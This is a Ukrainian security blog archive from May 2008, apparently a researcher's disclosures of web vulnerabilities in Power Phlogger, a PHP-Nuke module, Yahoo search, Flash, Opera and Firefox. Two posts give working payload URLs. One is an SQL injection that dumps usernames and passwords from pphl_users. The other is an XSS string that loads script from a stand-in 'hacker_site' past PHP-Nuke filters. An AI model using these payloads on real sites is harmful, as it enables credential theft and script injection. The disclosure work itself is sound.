Архів за Травень, 2008

Нові уразливості в Power Phlogger

23:54 31.05.2008

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 16.02.2008 та 31.05.2008, я виявив SQL Injection, Information Leakage та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

SQL Injection:

http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit

Information Leakage:

http://site/robots.txt

В robots.txt вказані важливі папки системи, що дозволяє знайти її ресурси та виявити інші Information Disclosure уразливості.

Full path disclosure:

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це п’ята частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Введення в безпеку PHP

22:42 31.05.2008

В своїй презентації Intro to Php Security, Dave Ross розповідає про безпеку PHP. Він розглядає дану платформу та веб додатки на PHP в контексті безпеки.

Виконання довільного коду в Adobe Flash Player

19:25 31.05.2008

Виявлена можливість виконання довільного коду в Adobe Flash Player. Уразливість дозволяє віддаленому користувачу скомпрометувати цільову систему.

Уразливі версії: Adobe Flash Player 9.0.115.0, 9.0.124.0, можливо більш ранні версії.

Уразливість існує через невідому помилку при обробці .swf файлів, що дозволяє віддаленому користувачу виконати довільний код на цільовій системі з привілеями користувача, що запустив браузер. Подробиці уразливості не розкриваються. Згідно Symantec, уразливість активно експлуатується в даний час.

  • Выполнение произвольного кода в Adobe Flash Player (деталі)

Добірка уразливостей

16:31 31.05.2008

В даній добірці уразливості в веб додатках:

Переповнення буфера в Opera

22:40 30.05.2008

Виявлене переповнення буфера в Opera.

Уразливі версії: Opera 9.24.

Переповнення буфера при розборі сертифіката TLS.

  • Opera - heap based buffer overflow (CVE-2007-6521) (деталі)

Уразливість на search.yahoo.com

20:14 30.05.2008

21.09.2007

Позавчора, 19.09.2007, я знайшов Cross-Site Scripting уразливість на http://search.yahoo.com - в пошуковій системі Yahoo. Про що найближчим часом сповіщу адміністрацію системи.

Раніше я вже писав під час MOSEB про уразливість в Image Search of Yahoo! Search.

Детальна інформація про уразливість з’явиться пізніше.

30.05.2008

XSS:

Дану уразливість, що працює при UTF-8 кодуванні сторінки (яке задане в Yahoo), вони вже виправили. Але дана уразливість також працює з Japanese (SHIFT_JIS) та Japanese (Auto-Select) кодуванням в Internet Explorer (але тільки, коли їх задати власноруч в браузері).

XSS:

Дана уразливість так досі не виправлена (хоча про другу уразливість, при двох інших кодуваннях, я Yahoo повідомляв).

Добірка експлоітів

16:25 30.05.2008

В даній добірці експлоіти в веб додатках:

  • PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability (деталі)
  • phpArcadeScript <= 3.0RC2 (userid) SQL Injection Vulnerability (деталі)
  • Mambo Component com_Musica (id) Remote SQL Injection Vulnerability (деталі)
  • Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) DoS Exploit (деталі)
  • Dynamic photo gallery 1.02 (albumID) Remote SQL Injection Vulnerability (деталі)
  • MiniWebSvr 0.0.9a Remote Directory Transversal Vulnerability (деталі)
  • Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit (деталі)
  • Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability (деталі)
  • XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability (деталі)
  • iG Shop 1.4 eval Inclusion Vulnerability (деталі)

Уразливість в AutoHTML для PHP-Nuke

23:53 29.05.2008

Вчора, 28.05.2008, я знайшов Cross-Site Scripting уразливість в модулі AutoHTML для PHP-Nuke. Про Local File Inclusion, Directory Traversal та Information Leakage уразливості в даному модулі для PHP-Nuke я писав раніше.

XSS:

http://site/autohtml.php?filename=%3Cscript%20src=http://hacker_site/xss.js%20

В даному випадку відбувається обхід анти-XSS фільтрів PHP-Nuke.

Уразлива версія PHP-Nuke AutoHTML Module 2.0 (та потенційно інші версії).

MustLive Perl Pascal Programs Interpreter

22:56 29.05.2008

Сьогодні вийшла нова версія програми Perl Pas Interpreter v.1.4.2. В новій версії:

  • Додана константа e (з 16-бітною точністю).
  • Оптимізована робота з константами.
  • Покращена робота write та writeln з пробілами.
  • Покращена робота вбудованих функцій з пробілами.

Деталі на сайті інтерпретатора. Тема для обговорення програми на форумі.

Додаткова інформація про Perl Pas Interpreter в розділі Онлайн інструменти.

Підміна фокуса в Mozilla Firefox

20:47 29.05.2008

В минулому році була виявлена можливість підміни фокуса в Mozilla Firefox (focus spoofing).

Уразливі продукти: Mozilla Firefox 2.0, xulrunner 1.8, iceweasel 2.0.

Можливо підмінити фокус введення тексту.

  • New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities (деталі)